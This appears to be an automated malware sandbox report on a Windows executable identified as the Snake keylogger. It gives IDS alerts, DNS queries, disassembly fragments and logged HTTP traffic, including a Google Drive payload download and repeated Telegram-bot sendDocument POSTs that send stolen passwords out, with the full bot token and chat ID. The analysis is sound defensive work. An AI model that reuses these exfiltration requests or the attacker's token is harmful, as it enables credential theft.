Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50052 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50036 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50002 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50036 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50002 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50024 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50024 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50040 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50040 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50062 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50062 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50044 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:50044 -> 149.154.167.220:443

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd318ef030315cHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31a3dcc4e99cHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31ba1ce8ae90Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31cc23064195Host: api.telegram.orgContent-Length: 1090
Source: global traffic	HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31de1c6e27dfHost: api.telegram.orgContent-Length: 1090
Source: global traffic	HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31f16a1963c9Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3206090b5403Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd321939efa937Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd322dba261e7eHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3240cd792635Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd325276d5484dHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3266c884144dHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3279b0efee4dHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd328b327df4ccHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd329dfebbbd2fHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32b213189091Host: api.telegram.orgContent-Length: 1090
Source: global traffic	HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32c36d0ba952Host: api.telegram.orgContent-Length: 1090
Source: global traffic	HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32d60ea18c5fHost: api.telegram.orgContent-Length: 1090
Source: global traffic	HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32e8a22dce36Host: api.telegram.orgContent-Length: 1090
Source: global traffic	HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32fb286e642dHost: api.telegram.orgContent-Length: 1090
Source: global traffic	HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd330da1445301Host: api.telegram.orgContent-Length: 1090
Source: global traffic	HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33200b7db480Host: api.telegram.orgContent-Length: 1090
Source: global traffic	HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3333b82a72feHost: api.telegram.orgContent-Length: 1090
Source: global traffic	HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd334605e9befdHost: api.telegram.orgContent-Length: 1090
Source: global traffic	HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd335d7b5fd182Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3373912f7e9cHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd338ae1dad58bHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33a36afe00b8Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33bd2b6aed7dHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33d58fba2b56Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33f447b5911dHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd34142e1138abHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3433fc6c9df6Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3458c368198eHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3484fdb0dcfaHost: api.telegram.orgContent-Length: 1090
Source: global traffic	HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd34afcee2471bHost: api.telegram.orgContent-Length: 1090
Source: global traffic	HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd34dbbdda11f8Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd35154a777d2aHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd354d6985ff47Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd358e0f65a80cHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd35cc02b4df6fHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd362136d2c0dbHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd36827099b96eHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.16.1 104.21.16.1
Source: Joe Sandbox View	IP Address: 132.226.247.73 132.226.247.73

Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 4x nop then jmp 348A1042h	3_2_348A0C28
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 4x nop then jmp 348AC985h	3_2_348AC638
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 4x nop then jmp 348A0671h	3_2_348A03C4
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 4x nop then jmp 348AB791h	3_2_348AB4EC
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 4x nop then jmp 348A1042h	3_2_348A0C1A
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 4x nop then jmp 348AC041h	3_2_348ABD88
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 4x nop then jmp 348AE198h	3_2_348ADEE1
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 4x nop then jmp 348AEA48h	3_2_348AE790
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 4x nop then jmp 348A1042h	3_2_348A0F6F
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 4x nop then jmp 348AF2F8h	3_2_348AF042
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 4x nop then jmp 348AB339h	3_2_348AB07F
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 4x nop then jmp 348AC499h	3_2_348AC1F2
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 4x nop then jmp 348ABBE9h	3_2_348AB944
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 4x nop then jmp 348ADD40h	3_2_348ADA89
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 4x nop then jmp 348AEEA0h	3_2_348AEBF2
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 4x nop then jmp 348AE5F0h	3_2_348AE339
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 4x nop then jmp 3763882Dh	3_2_37638650
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 4x nop then jmp 376391B7h	3_2_37638650
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 4x nop then push 00000000h	3_2_3763BDF0
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 4x nop then jmp 37634218h	3_2_37633F70
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 4x nop then jmp 376361B8h	3_2_37635F10
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 4x nop then jmp 37636A68h	3_2_376367C0
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 4x nop then jmp 37631250h	3_2_37630FA8
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 4x nop then jmp 37635908h	3_2_37635660
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 4x nop then jmp 376330B8h	3_2_37632E10
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 4x nop then jmp 37633968h	3_2_376336C0
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 4x nop then jmp 37632808h	3_2_37632560
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 4x nop then jmp 37635058h	3_2_37634DB0
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 4x nop then jmp 376316A8h	3_2_37631400
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 4x nop then jmp 37636EC0h	3_2_37636C18
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 4x nop then jmp 37637770h	3_2_376374C8
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 4x nop then jmp 37631F58h	3_2_37631CB0
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 4x nop then jmp 37636610h	3_2_37636368
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	3_2_37637B4F
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 4x nop then jmp 37633DC0h	3_2_37633B18
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 4x nop then jmp 37634670h	3_2_376343C8
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 4x nop then jmp 37633510h	3_2_37633268
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 4x nop then jmp 376354B0h	3_2_37635208
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 4x nop then jmp 37635D60h	3_2_37635AB8
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 4x nop then jmp 376323B0h	3_2_37632108
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 4x nop then jmp 37632C60h	3_2_376329B8
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 4x nop then jmp 37637318h	3_2_37637070
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 4x nop then jmp 37631B00h	3_2_37631858
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 4x nop then jmp 37634ACAh	3_2_37634820
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 4x nop then push 00000000h	3_2_37B6E7C8
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	3_2_37B6F5D8
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 4x nop then push 00000000h	3_2_37B6F316

Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49861 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49919 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49827 -> 142.250.181.238:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1tBsrC4u2iD4Tc-3CQ1gHCfISO7xUM42y HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1tBsrC4u2iD4Tc-3CQ1gHCfISO7xUM42y&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
